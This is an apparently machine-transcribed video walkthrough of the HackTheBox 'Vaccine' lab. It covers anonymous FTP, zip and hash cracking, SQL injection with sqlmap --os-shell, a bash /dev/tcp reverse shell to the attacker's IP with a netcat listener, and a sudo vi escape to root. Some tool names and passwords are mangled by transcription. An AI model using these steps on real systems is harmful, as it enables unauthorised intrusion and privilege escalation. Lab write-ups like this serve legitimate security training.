Hello guys, welcome to another video. Today we will be solving the vaccine machine from HackTheBox. I already have spawned it and copied the IP, so let's go ahead and start the mmap scale. So to do that you have to do sudo mmap-sc -sb and then I'll export it as mmap format, and then the IP address. I'll get you when it's done. Okay, so this has finished and we can see right here 3 open ports. TCP port 21 with an FTP service which is anonymous right here, FTP anonymous, then an SSH port, and then an HTTP service on port 80. So let's go ahead and check the FTP. So just simply write FTP and the IP for the target, and then a name which is anonymous. This is the default. These are the default credentials for the FTP anon server, and then a password which is normally anon123, and it does get it. So we can type there to see files. There's a backup.zip, so let's go ahead and get it. So simply get backup.zip. You hit enter and then basically you can go away and you have it right here. So let's unzip backup.zip, and it asks for a password which we don't have. So looks like we will have to crack the password. So to do that we can use the John utility which comes with Kali and Parrot, but you can zip to John backup.zip and then hashes. So zip to John backup.zip to hashes. So we make ls and we've got here a file. So now we have to use hashcat to break that hash. So hashcat -a0 -m0 hash, and sorry, now what you have to do is use John, so -- word list, and here we will use a list of word lists, that is the rocku.txt, which is in user share word list, and then rocku.txt on it. This is on Kali and a Parrot, and then hashes. Okay, so this has finished, and then to see the password you need to do John -- show hashes. You hit enter and you see right here backup.zip, and this right here is the password. So I'll just copy it and then unzip backup.zip and paste the password. So now if we make ls, we can see right here 2 files, index.php and style.css. So what we are looking for should be on index.php, so get index.php, and then right here session start, username admin. So right here we have a username, and then here what looks like a password but it really is a hash. So let's go ahead, copy the hash, and then put that hash onto a file that I will just call hash. We hit enter and cat hash, and we've got the hash right there. So now we have to use hashcat to crack it. So hashcat dash a 0 dash m0, then hash, and then slash user share word lists and the rockyou.txt. So now hashcat dash dash show and we've got right here the password query 789. So now that we have a password, I think we can go ahead and check the HTTP server. So I'll open right here and then HTTP / and the IP, which is 10.129. And we've got a simple login page. So the username was admin and password query 789. Let's sign in, and we do sign in successful. So now we only have a search thing. So let's search something, okay, for example this. And now what we can do is try and see if this is actually vulnerable to an SQL injection. Okay, so now here what we can search is see if it's vulnerable to an SQL injection. So you put quotation mark single or 1 between single quotation marks equals and then 1 with a quotation mark at the end, and you search and we do have an error. So what we can do now is open burp suite and try to get a request file. So to do that, what you need a proxy. You can use burp suite, already has one. Burp suite already has one. So if you go here onto proxy, you can use that browser, but you would have to log in again, all that stuff. I have Foxy proxy right here, and you need to configure a proxy that you basically here a burp suite proxy. You basically have to create a new proxy that runs, which IP is 127.0.0.1 localhost, and then a port which is 8080. So here I already have it selected. I'll use that one and put it again. And if we go here onto burp suite, here onto HTTP, we already have it right here. This. So now you have to copy all of this. I'll just copy it and then right here create nano dot request and paste it. Then user request, exit, and then what you have to do is SQL map -r new dot request. You hit enter, and this will already do. It will ask you some questions. So here, yes, So again, yes, no. Well, we can try with another search, for example, A. We've got this one right here. So copy everything, echo to new dot request, and then this again, and we paste here everything. So now cat new dot request, and we've got the new one. So now the same SQL map dash r new dot request. And now what we can try to do is, if we do SQL map dash dash help, we can see right here that we can get in a shell, So basically what you can do is SQL map dash r new dot request and then dash dash os dash shell. So you hit enter, and that should give you a shell, which we already have right here. So now you type who am I, and you can see that we are this user. So now we need to make the shell more interactive, and to do that, what you have to do, it's basically bash dash c, and then you open double quotation mark, bash dash I, and ampersand slash def slash tcp slash, and then your HackTheBox IP, which I have right here, 10.10.16.38, and then slash 443 or any other port, and then 0 is greater than ampersand 1. And now we need to, right here, sudo nc -lvmp and port 443 to run netcat right here listening. So you hit enter, I'll put my password, and then it's listening here. So now you just hit this, yes, and we've got right here a shell. So now we have to improve it. So to do that, we will do python 3-c import pty colon pty dot spawn, and then open parenthesis, double quotation mark, slash bin slash bash, close quotation mark and parenthesis, and then close the single quotation mark. But I've for pty dot spawn slash bin slash bash, close quotation mark and parenthesis, and again the quotation mark. Python 3 and then slash bash, close quotation, close parenthesis. Okay, so after importing with Python, what you have to do is stop this. So to do that, Control Z and then stty raw dash echo, hit enter, fg, and then export term equals xterm. You hit enter, and now this is much better. Okay, so now we have to do ls, then we've got a lot of stuff, but let's go to a folder cd global or cd dot dot cd dot dot cd dot dot, go back, and then ls, and we've got here user.txt. So cat user.txt, and we've got here the shell. So I'll copy it, new tab, and then right here echo to user.txt. And then right here we need to go now with the privilege escalation. So we can do sudo -l, and we do not have any password, so we'll have to put random password right here. Now, like we cannot do that, cd/var, let's go there, ls, let's go to let's go to www ls cd html, and then ls, and we've got a few things right here. Let's go ahead and check the cat dashboard.php like this. This is quite long, and it starts right here. So here, session start, localhost right here. This is actually quite interesting, because right here we've got a password. So I'll copy it, and now I'll create a new tab. So SSH, and then Postgres, Postgres, add and the target IP 10.129.142.244. And then the password, hit enter, and we now have a shell. So now sudo -l, and we can paste that password. We can run these things right here. But now sudo /bin/bi, and then /etc Postgres SQL /11 /main /pj down /hba.conf. Okay, so now we will the same, then -c quotation mark /bin/bash, sorry, sh, to get a shell, and then we close quotation mark. And we get this, we cannot run it, it's root. So now bi, and we can like this, and then set shell equals /bin/sh to set a shell. So when we open the file, we actually get a shell, and then we exit. Now we have to run again this right here, like this, and then shell, and we have right here, you can see a root shell. So who am I? We are root. Okay, so now we can cd we are on /root, and if we make ls, we've got right here the root.txt. So cat root.txt, and we will copy the flag and echo to root.txt. Perfect, that's it. We are finished. We have hacked this machine. So let's go ahead and solve the answer. So besides SSH and HTTP, what other services hosted on the box? So I'll go here and then cat all ports, and we've got a TCP, a FTTP, so that should be a FTP, an FTP server. And then this service can be configured to allow login with any password for a specific username. What is the username? what is the name of the file downloaded over this service? Backup.zip. And then, what scripts comes with a John the Ripper toolset and generates a hash from a password protected zip? This is what scripts. This is zip to John. Then, what is the password for the admin user on the website? For this will I will John dash dash show hashes, and we've got here the password. Oh no, sorry, in the website. This was security789. What option can be used to SQL map to try and get command execution via the SQL injection, that is dash dash os dash shell? What program can the Postgres user run as root using sudo? That was bi for bim, and then the user flag cat user.txt here, and then last cat root.txt. The root flag right here, paste it, and we have pawned the debugging machine. Thank you very much for watching, and see you in the next video.